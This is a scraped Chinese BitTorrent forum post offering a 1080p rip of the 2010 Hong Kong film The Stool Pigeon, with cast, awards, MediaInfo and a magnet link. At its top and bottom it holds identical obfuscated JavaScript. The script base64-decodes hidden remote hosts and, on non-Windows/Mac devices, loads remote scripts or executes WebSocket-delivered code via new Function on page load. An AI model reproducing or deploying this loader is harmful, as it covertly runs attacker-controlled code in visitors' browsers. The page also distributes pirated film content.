线人[国粤语配音/中文字幕].The.Stool.Pigeon.2010.1080p.BluRay.x265.10bit.DTS.2Audio 8.81GB

版主小s 19天前 186

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 线人 / 证人2之线人 / Beast Stalker 2: Informant / The Stool Pigeon

◎片 名 綫人

◎年 代 2010

◎产 地 中国香港 / 中国大陆

◎类 别 剧情 / 动作 / 惊悚

◎语 言 粤语 / 汉语普通话

◎上映日期 2010-08-24

◎IMDb链接 https://www.imdb.com/title/tt1535492/

◎豆瓣评分 7.4/10 (132549人评价)

◎豆瓣链接 https://movie.douban.com/subject/4133814/

◎片 长 113分钟

◎导 演 林超贤 Dante Lam (id:1275075)

◎编 剧 吴炜伦 Wai Lun Ng (id:1275435)

林超贤 Dante Lam (id:1275075)

◎演 员 谢霆锋 Nicholas Tse (id:1050053)

张家辉 Nick Cheung (id:1037273)

桂纶镁 Lunmei Gwei (id:1215287)

陆毅 Yi Lu (id:1014781)

苗圃 Pu Miao (id:1033846)

廖启智 Kai Chi Liu (id:1274268)

钟舒漫 Sherman Chung (id:1274529)

吴浩康 Deep Ng (id:1313361)

郭政鸿 Jing-hung Kwok (id:1044122)

梁小冰 Siu-bing Leung (id:1016083)

颜子菲 Belinda Yan (id:1359500)

严嘉仪 Yim Ka Yee (id:1405545)

黄伟辉 Wong Wai-Fai (id:1275163)

金刚 Kong King (id:1317182)

何华超 Tony Ho (id:1286723)

尹扬明 Yeung Ming Wan (id:1313041)

李成昌 Shing-Cheung Lee (id:1315069)

姜皓文 Philip Keung Ho-Man (id:1317884)

陈莎 Iris Chen (id:1460041)

杨庭恺 Bernard Yang (id:1443208)

林炳坤 Bingkun Lin (id:1350348)

杨受成 Albert Yeung (id:1313455)

梁凤英 Candy Leung (id:1326682)

王中军 Zhongjun Wang (id:1276036)

利雅博 Albert Lee (id:1326683)

黎允文 Henry Lai (id:1289266)

谢忠道 Kenny Tse (id:1319336)

陈祺合 Ki-hop Chan (id:1280429)

许伟杰 Matthew Hui (id:1328641)

曾景祥 Kinson Tsang (id:1299575)

黄伟辉 Wong Wai-Fai (id:1275163)

吕丽桦 Olivia Lui Lai-wah (id:1328035)

王日平 Yat Ping Wong (id:1350616)

Rob Lok Rob Lok (id:1369769)

◎标 签 香港电影 / 谢霆锋 / 香港 / 张家辉 / 桂纶镁 / 动作 / 林超贤 / 2010

◎简 介

为了侦破棘手案件,警方往往借助线人之手获取情报。然而在行动过程中,却常常有意无意置线人于危险之地。一年前,线人废噏(廖启智 饰)的悲惨下场让香港警察李沧东(张家辉 饰)的身心备受煎熬,表面的荣迁始终洗刷不掉铭刻其心中的罪恶感。而如今,他不得不再次与新的线人合作。这次,他找到了命运多舛的小混混何细鬼(谢霆锋 饰)。为了搭救身陷水火的妹妹,细鬼无奈接受了李沧东的任务,打入金行大盗华天(陆毅 饰)的团伙内部获取情报。

在细鬼的帮助下,警方掌握越来越多的证据,抓捕的罗网也渐渐收拢。与此同时,细鬼的境遇也愈加危险。一年前的悲剧似乎将再次重演,李沧东该如何选择……

◎获奖情况 (共12项)

第30届香港电影金像奖 (2011)

最佳电影(提名)

最佳导演(提名)

└──林超贤 (id:1275075)

最佳编剧(提名)

└──吴炜伦 (id:1275435)

最佳男主角

└──谢霆锋 (id:1050053)

最佳男主角(提名)

└──张家辉 (id:1037273)

最佳男配角(提名)

└──廖启智 (id:1274268)

最佳剪接(提名)

最佳音响效果(提名)

└──曾景祥 (id:1299575)

第5届亚洲电影大奖 (2011)

最佳摄影(提名)

└──谢忠道 (id:1319336)

第18届北京大学生电影节 (2011)

最佳影片奖(提名)

最佳导演奖(提名)

└──林超贤 (id:1275075)

最佳男演员奖(提名)

└──谢霆锋 (id:1050053)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 26657542165797257649699385722283329247 (0x140E0E4D808656F0D58A820101D186DF)

  4. Complete name : [email protected]BQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.81 GiB

  8. Duration : 1 h 52 min

  9. Overall bit rate : 11.3 Mb/s

  10. Movie name : The Stool Pigeon - Blu-ray?

  11. Encoded date : UTC 2021-11-11 04:09:05

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 52 min

  23. Bit rate : 8 209 kb/s

  24. Width : 1 920 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.218

  33. Stream size : 6.43 GiB (73%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.5000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio #1

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 52 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1.18 GiB (13%)

  53. Title : Mandarin

  54. Language : Chinese

  55. Default : Yes

  56. Forced : No


  57. Audio #2

  58. ID : 3

  59. ID in the original source medium : 4352 (0x1100)

  60. Format : DTS

  61. Format/Info : Digital Theater Systems

  62. Codec ID : A_DTS

  63. Duration : 1 h 52 min

  64. Bit rate mode : Constant

  65. Bit rate : 1 509 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : C L R Ls Rs LFE

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 93.750 FPS (512 SPF)

  70. Bit depth : 16 bits

  71. Compression mode : Lossy

  72. Stream size : 1.18 GiB (13%)

  73. Title : Cantonese

  74. Language : Chinese

  75. Default : No

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #1

  79. ID : 4

  80. Format : PGS

  81. Muxing mode : zlib

  82. Codec ID : S_HDMV/PGS

  83. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration : 1 h 46 min

  85. Bit rate : 15.7 kb/s

  86. Count of elements : 1738

  87. Stream size : 12.0 MiB (0%)

  88. Title : chs

  89. Language : Chinese

  90. Default : Yes

  91. Forced : No


  92. Text #2

  93. ID : 5

  94. Format : PGS

  95. Muxing mode : zlib

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 1 h 46 min

  99. Bit rate : 15.8 kb/s

  100. Count of elements : 1738

  101. Stream size : 12.1 MiB (0%)

  102. Title : cht

  103. Language : Chinese

  104. Default : Yes

  105. Forced : No


  106. Text #3

  107. ID : 6

  108. ID in the original source medium : 4610 (0x1202)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 45 min

  114. Bit rate : 21.4 kb/s

  115. Count of elements : 1780

  116. Stream size : 16.2 MiB (0%)

  117. Title : eng

  118. Language : English

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Menu

  123. 00:00:00.000 : en:Chapter 01

  124. 00:09:23.000 : en:Chapter 02

  125. 00:16:28.125 : en:Chapter 03

  126. 00:26:50.250 : en:Chapter 04

  127. 00:33:17.958 : en:Chapter 05

  128. 00:41:08.875 : en:Chapter 06

  129. 00:52:13.250 : en:Chapter 07

  130. 00:58:13.583 : en:Chapter 08

  131. 01:10:28.666 : en:Chapter 09

  132. 01:21:07.125 : en:Chapter 10

  133. 01:34:58.041 : en:Chapter 11

  134. 01:45:23.000 : en:Chapter 12



TAGS 动作 剧情 惊悚

磁力链:
  • magnet:?xt=urn:btih:02452D1A46E92BA34C3517BBDB83CE38455EC650

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};